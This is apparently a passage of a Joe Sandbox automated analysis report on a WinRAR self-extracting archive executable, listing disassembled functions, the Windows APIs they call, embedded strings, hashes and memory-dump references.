                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: :$EFS:$LOGGED_UTILITY_STREAM$:$I30:$INDEX_ALLOCATION$:$TXF_DATA:$LOGGED_UTILITY_STREAM$::$ATTRIBUTE_LIST$::$BITMAP$::$DATA$::$EA$::$EA_INFORMATION$::$FILE_NAME$::$INDEX_ALLOCATION$::$INDEX_ROOT$::$LOGGED_UTILITY_STREAM$::$OBJECT_ID$::$REPARSE_POINT
                                      • API String ID: 3668304517-727060406
                                      • Opcode ID: d1f70ab6d0ae8b3084d51eef4787e874430d0504aa66550a33771c8389bfad96
                                      • Instruction ID: 2247045f70c8d46cf0669cbdb4306717219280e0f7ef71a58fe9e8f5b2015f9e
                                      • Opcode Fuzzy Hash: d1f70ab6d0ae8b3084d51eef4787e874430d0504aa66550a33771c8389bfad96
                                      • Instruction Fuzzy Hash: 0A41D576B06B0299EB00CF64E5803E937A9EF48798F480676DA4CE3B69EE38D555C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A382990 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                      • API String ID: 2565136772-3242537097
                                      • Opcode ID: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                      • Instruction ID: c875859a1e6dd252acf6426b6bd6a9259c57a692e6b6e781cc7cf372be59e3cb
                                      • Opcode Fuzzy Hash: fdee9745a353db95c9b4b27806cffd46c0390e42e013dce2f99bb91082c79cfb
                                      • Instruction Fuzzy Hash: B0212164F1AA0796FF14DFA0EA9517527A1AF8878CF4C01B5D91EE27A0DF3CE5458340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A3669CC Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 444COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                      • String ID: DXGIDebug.dll$UNC$\\?\
                                      • API String ID: 4097890229-4048004291
                                      • Opcode ID: 2b62bd64c3bbf903d9ade41e2b83ec1f9261fa72456887eaafe308be92646ed5
                                      • Instruction ID: 462d67d2c616722c860ef493c01dc3f4f7463879f8c2626ec5297f713d1cef03
                                      • Opcode Fuzzy Hash: 2b62bd64c3bbf903d9ade41e2b83ec1f9261fa72456887eaafe308be92646ed5
                                      • Instruction Fuzzy Hash: 7912DC22B09A4280EB14DB69E4441AD6372EF85BCCF584272DA5DE7BE9DF3CD549C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37A3C0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 257COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                      • String ID: GETPASSWORD1$Software\WinRAR SFX
                                      • API String ID: 431506467-1315819833
                                      • Opcode ID: f5510aebd172c9ec0c15d2c3426bb18c7e90e40235729a4241aa0d5830a32387
                                      • Instruction ID: fe0c21c5d463b8bcc93e75b55d4e7dd259e15beed5b01631431c307da16fbc16
                                      • Opcode Fuzzy Hash: f5510aebd172c9ec0c15d2c3426bb18c7e90e40235729a4241aa0d5830a32387
                                      • Instruction Fuzzy Hash: D7B1AE62F19B8289FB009BA4E4842AC2362AF4539CF584275DE5CF7AD9DE3CE546C344
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38E5D0 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                      • API String ID: 3215553584-2617248754
                                      • Opcode ID: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                      • Instruction ID: a8f5da67bf4430d261e166384e84dbabc2f6053ab285b94367afdfc63408e9ed
                                      • Opcode Fuzzy Hash: a60231409e47c1a5672abfa229f1b0c42138c6649af1949bad2eb6332146811d
                                      • Instruction Fuzzy Hash: 96419D72A0AB458DEB40CF25E8417A933A4EF18398F194576EE5CE3B54DE3CD025C344
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37F310 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                      • String ID: STATIC
                                      • API String ID: 781704138-1882779555
                                      • Opcode ID: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
                                      • Instruction ID: 4739420bc3c6d693e42f656e17974ac36d7112dcfb2d7daa609efcd89022b78d
                                      • Opcode Fuzzy Hash: 0a32551ddf3b327544de21b3e538b695597bcc4fc0cc33eb1cc93d7c3056c0d2
                                      • Instruction Fuzzy Hash: 8831EF25B08A52C6FA60AB12E8017B923A2BF89BC8F584070DD4EE7B55DE3CE5078740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A376E00 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 204memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$AllocGlobal
                                      • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                      • API String ID: 2721297748-1533471033
                                      • Opcode ID: 27a1c77f5fc281c8209104d1890cdbac340ca96cb5bdc4f2b0dec88e7dbf10f4
                                      • Instruction ID: 90e965b2dfbdafb511d2a565dd12250c23b29147e268ca0771854a8741a7917b
                                      • Opcode Fuzzy Hash: 27a1c77f5fc281c8209104d1890cdbac340ca96cb5bdc4f2b0dec88e7dbf10f4
                                      • Instruction Fuzzy Hash: 6A81AF62F19A4285FB00DBA5D8502ED6372AF4578CF480576DE1DF7A99EE38D606C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A37AE10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item$Text
                                      • String ID: LICENSEDLG
                                      • API String ID: 1601838975-2177901306
                                      • Opcode ID: 1a30000b72e84f8ba6293dbf14933a0a72ddbc058ae9ffcbcc0226747817138c
                                      • Instruction ID: 48f61b78d60c231263d451528ab40f2b7ccb20c5c007f1c8a1d5e651eb3398b1
                                      • Opcode Fuzzy Hash: 1a30000b72e84f8ba6293dbf14933a0a72ddbc058ae9ffcbcc0226747817138c
                                      • Instruction Fuzzy Hash: E7418F25F08B56C2FB549B55F8547792762AF84F88F5C02B5D90EE7BA4CF3CA6468300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36B970 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentDirectoryProcessSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                      • API String ID: 2915667086-2207617598
                                      • Opcode ID: 0287272f6ced8d38123369f0e78f7e516f0e1226113c6a7574fd01a02cbcf18c
                                      • Instruction ID: c6c73a680e78e02a1a2a99602671517ff84629c1d242a913352be852b2011d2e
                                      • Opcode Fuzzy Hash: 0287272f6ced8d38123369f0e78f7e516f0e1226113c6a7574fd01a02cbcf18c
                                      • Instruction Fuzzy Hash: 1D316920A4AB4786FA14DF16E9501752BA1FF49B9CF0D02B5C84EE33A0EF7CE5418B40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A378758 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: $
                                      • API String ID: 3668304517-227171996
                                      • Opcode ID: 5700efd69fbe91ad63471e00e5e4e78b95961d0656bab2311fdadc64f94d29dc
                                      • Instruction ID: 58b0c59129820c93144aa12db0e851637cd9057a5532ee3de45f0b961f6a6e4b
                                      • Opcode Fuzzy Hash: 5700efd69fbe91ad63471e00e5e4e78b95961d0656bab2311fdadc64f94d29dc
                                      • Instruction Fuzzy Hash: 27F1BD62F1574280EE049B69D4881BC2B62AF45BACF585671CA5DE7BD5EF7CE2C0C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38576C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 2940173790-393685449
                                      • Opcode ID: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
                                      • Instruction ID: bb65bbda7117c3acdf08db3029c1f68bd87667732abd680efa7f69656cbacc8d
                                      • Opcode Fuzzy Hash: 3e10ce34ec1ec2318b4e5d1a096f68ad678d9ed54216a6dc3b478c18613d0621
                                      • Instruction Fuzzy Hash: 7CE1AE72A0A7838AEB209F64D4903AD7BA0FF44B5CF184175DA8DE7696DF38E585C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A364EF8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 158COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AllocClearStringVariant
                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                      • API String ID: 1959693985-3505469590
                                      • Opcode ID: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
                                      • Instruction ID: 06a03c3deced7fc5e21cdc4fefd8aec4f9d0fa7e58a7d7da617c7df041b9db5c
                                      • Opcode Fuzzy Hash: 408e286e95d7be2333e7e980e9c5bf6a4dc44dd0e8b0d4c37376681f41bb0957
                                      • Instruction Fuzzy Hash: DC711776A14B0689EB20CF25E9805AD7BB4FF88B9CB485172EA4ED3B64CF38D144C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A38726C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A3872F1
                                      • GetLastError.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A3872FF
                                      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A387329
                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A38736F
                                      • GetProcAddress.KERNEL32(?,?,00000000,00007FF65A387473,?,?,?,00007FF65A3851DE,?,?,?,00007FF65A385199), ref: 00007FF65A38737B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                      • String ID: api-ms-
                                      • API String ID: 2559590344-2084034818
                                      • Opcode ID: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
                                      • Instruction ID: cdc049bad6d083509ca447ea38288b6bb7926f0c1796d02e0785dcc4ee26a924
                                      • Opcode Fuzzy Hash: c3b9cc9cdd52f2350940838b7b06db5a4f889f983fd09e5162c1733cb5f95556
                                      • Instruction Fuzzy Hash: B6312221A1BA4385EE119B12A8006792796FF48BA8F0D0574ED1DFB390EF7CE0408340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A381584 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(?,?,?,00007FF65A3814F3,?,?,?,00007FF65A3818AA), ref: 00007FF65A3815AB
                                      • GetProcAddress.KERNEL32(?,?,?,00007FF65A3814F3,?,?,?,00007FF65A3818AA), ref: 00007FF65A3815C8
                                      • GetProcAddress.KERNEL32(?,?,?,00007FF65A3814F3,?,?,?,00007FF65A3818AA), ref: 00007FF65A3815E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 667068680-1718035505
                                      • Opcode ID: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
                                      • Instruction ID: 477647af97aafbacb522dabb9fa3c5064f9a36f3a2d1e0cbc56c5522dbbd4438
                                      • Opcode Fuzzy Hash: b86a11e47b759afb9776b5a8196b9ce040a12c050a3cc6a343a5a4dac9788fc5
                                      • Instruction Fuzzy Hash: BF112D20E0BB0785FEA18F01EA4027562D16F4879CF4C55B5C99EE6350EF3CE4948250
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36ECA4 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF65A365164: GetVersionExW.KERNEL32 ref: 00007FF65A365195
                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED0C
                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED18
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED28
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED36
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED44
                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF65A355ABC), ref: 00007FF65A36ED85
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion
                                      • String ID:
                                      • API String ID: 2092733347-0
                                      • Opcode ID: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
                                      • Instruction ID: 4b88ecaec4f59ae0b50f929d9eac9885247912c51f6830a4ca0a42501de796cf
                                      • Opcode Fuzzy Hash: fd651a404897a6a4441ea403f02956d6baa9a0eb7a17f9813df5aa7066cb431e
                                      • Instruction Fuzzy Hash: 7C5149B2B146518EEB14CFA9E4441AC37B1FB48B88B64403ADE4DA7B58DF38D555C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FF65A36EF90 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmpDownload File
